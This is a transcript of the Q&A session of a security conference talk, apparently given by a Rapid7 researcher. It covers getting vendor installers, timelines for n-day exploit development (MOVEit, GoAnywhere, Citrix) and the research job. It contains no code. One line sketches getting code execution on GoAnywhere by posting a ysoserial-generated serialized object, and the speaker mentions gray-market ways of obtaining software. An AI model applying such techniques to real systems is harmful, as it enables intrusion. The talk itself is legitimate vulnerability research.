there's a button called Free Downloads, and the free downloads... I don't know if it's going to load, I'm tethered to my phone for Wi-Fi. I'm clicking the wrong thing, that's why. It just has, like, what version do you want. Like, thank you, this is so beautiful. I wish every... and honestly, it's in the vendor's best interest to let researchers have their stuff. And there's this big thing this week: WS_FTP, their vendor pulled their free download because people were writing exploits, and like, the exploits are written, it's too late, but what can you do. Yeah, sometimes there's a loose community of people who do this stuff, and if I see company X, who I know people at, developed the
initial exploit, I can text my friend and say, hey, do you have the software? It's all very gray-market stuff, but we don't usually register it; usually installing, not registering, is enough. I've heard some people use the cheat code of VirusTotal Intelligence, because somebody's uploaded all the installers for whatever reason. Yeah, as Jeff said, if you have a SHA-1 or a file name or something, you can often get it from VirusTotal. Yeah, I think there could be a whole talk in how to get the software, and sometimes that's half the project, getting the software, honestly.

Yes? How long did it take you
to do this whole process, start to finish? How long does it take you, just on average? So the question is how long did it take me, from start to finish, at this process. This one was about two weeks, and there were two of us working on it for a lot of that, so it took two people about two weeks to get from beginning to end. Getting the first blog out is a few hours, getting the PoC running is usually like a week, maybe two weeks, and then the Metasploit module, if we have time and it makes a good module, another couple of days, usually. We also pass out the Metasploit module
to their team, because my manager manages me and the Metasploit team, but we're not the Metasploit team. So sometimes we write it, sometimes we let them write it, sometimes we don't write it; it all really depends. Yeah, sometimes, like MOVEit back in early this year, that took like a good three weeks or something. MOVEit was a pain, and that was actually a thing I wanted to mention when I was talking about diffing the patches: this patch diff was 17,897 lines; the MOVEit patch diff was like 20 lines, and it took me way longer to develop an exploit for MOVEit, because it was super unclear how the changes
they made compared to being able to run code; it made no sense how to get from one to the other. So it took even a lot of good people weeks to get that out. So it can be that complex sometimes. GoAnywhere was a managed file transfer from early this year, and from a vendor advisory that just said this endpoint is vulnerable to code injection, or to code running, it was like half a day. It said this endpoint is vulnerable, I looked at the endpoint, and it said deserialize this POST request. I'm like, oh, so I use ysoserial, generate a malicious serialized object, do the POST, get code. So it really
varies. Sometimes it's simple, sometimes it's complicated; you just never know.

Another question. The question is, does this job stay interesting, or do I get bored to tears? Both. I appreciate there's a lot of variety, and there are a lot of pros and cons about these things. The variety is that when there's a bad vulnerability, we'll drop everything and spend a day, a week, two weeks working on this new thing, and there's a lot of adrenaline: our competitors are working on these, we're working on these, there's information slowly coming out, you're solving a mystery. Like, what's this code do? Why are you making this change to the local
host-only code even though there's no localhost-only component, which was MOVEit. It's a mystery to solve and a puzzle to solve, and it's really cool. And then when there's no emergent threat burning, no emergent threat that we're worried about, we're doing 0-day research, which is often very self-directed: software we think is important, which for me this year has been file transfer. Grab the software at more or less my own pace, take it apart, figure out what the vulnerabilities are, find some zero-days, report them to the vendor, argue with the vendor, disclose things. It's very self-directed, so I get to work on what I think is interesting. My coworker Stephen has been working on
Pwn2Own stuff, which is a whole different thing; it's more embedded and stuff like that. So I think the variety keeps it interesting. It's certainly tedious sometimes, especially when you have 18,000 lines to go through; it's like, when's this going to end? But I think it's really neat that in addition to doing the actual technical stuff and reversing and all that, I then get to write a blog about it. I love writing; I have my own blog, I have my Rapid7 blog, I get to write about it, I get to do talks about it. I love, like, how can I
take this two weeks of banging my head and make this into something interesting that others can learn from, you know, make some jokes, show some code and that. And being able to do a bunch of different things: I do a high-level blog, a low-level AttackerKB, a mixed talk. I think it's the best that I get to do a huge variety of stuff. I also really appreciate that my team at Rapid7, they know that we're deep-dive research and they don't give us strict timelines. It's kind of like, if I feel like I'm going to make progress, I can keep going until I
don't think I can make progress. And there have been times I've given up, and usually just after giving up is when I find the actual vulnerability, which was Citrix something-something last year. It's like, okay, I've spent two weeks on this, I'm just going to look at what ports are open and then call it, and then a day later I had a 0-day. But they give us the time we need, and a lot of companies, especially in 2023 with everything going on, don't give you the time you need. So I really appreciate that if we think we can get a good output, we're generally given the slack and the time to actually create the output, and
even writing a talk: my boss gave me time at work to write this talk, and time off work... wait, it's Saturday, but in theory, in theory, time off work to give this talk. Which, again, having great management and a great boss makes this good. This could easily be tedious if I was being rushed, like, you have one day to write this analysis; that'd be much worse. Yeah.

The question is, what's the ratio of when we get to read the code and when it's a binary? Enterprise stuff is largely Java and decompiles pretty cleanly. So I think... do I still have my CV
open? Yeah, so like this year, stuff I discovered: Unitronics, that was a binary, that was a Linux executable, that was really neat, that was reversing a protocol. GlobalSCAPE was Java... no, that was C++, so that's two. JSCAPE, that was deserialization, that was Java. So two binary, one code. And then of all the n-day analyses: GoAnywhere was Java; ManageEngine, that was Java, I think, or... I forget. Fast PEX, that was Ruby, which was really strange; I didn't know anyone wrote things in Ruby besides me. The Apache thing, I don't even remember what this was. MOVEit was this .NET and also
something else; yeah, there was a low-level end on that stuff, so this was both. VMware, I think, was Java. Citrix, that Citrix was a binary, so obviously... The SonicWall thing we just looked at was Java, and then Juniper J-Web, this was like a month, less than a month ago; I forget what it was. I would say about 50/50 is what it sounds like, just from a complete guess. I think this one was also... I don't know, I'm not sure I actually reversed this one; I think I just saw somebody else's exploit and wrote about it. Yeah, I'd say about half and half between low-level and high-level code. I feel
like the enterprise stuff typically trends towards high-level stuff like .NET and Java. I typically trend towards low-level stuff; I like protocol parsers. One of my favorite projects was that one I just talked about, the Unitronics stuff, because I implemented their whole protocol, and it was complicated; there was a lot to it. But I reverse-implemented their entire protocol and found auth bypasses and overflows and all kinds of stuff. That's what I like: I like using a debugger, I like understanding a bunch of ridiculous assembly code. But realistically, most vulnerabilities that come out aren't in this level of code. Most vulnerabilities are deserialization
these days, or are in like Java/.NET code, and I think part of that too is mitigations. It's much harder to write exploits for C code these days, because compilers add stack canaries and non-executable stacks and all these things; it's much, much harder. Unless it's Citrix, in which case you can still run code off the stack. That was Citrix, that was... where's Citrix? Go down, no, up. Yeah, this one was literally a run-code-off-the-stack level of vulnerability. It was unbelievable. I don't think I've ever written an exploit in my professional career, except in CTFs, where we could run code off the stack, except for this one.
So yeah, this was neat. I also got to pair up on this one. Usually there are two of us on my team; one of us is European and I'm Canadian, but I live here, so we don't get much overlap. But this one I actually had to work with a coworker, and that was pretty fun, being able to go back and forth. Yeah.

Something people always ask me is, is there RSS for AttackerKB? And the answer is no, which is upsetting. I wish there was. We do... there is, I put it in my... somewhere. We have an RSS link for our blogs, but it's not actually published anywhere, so somewhere I have a secret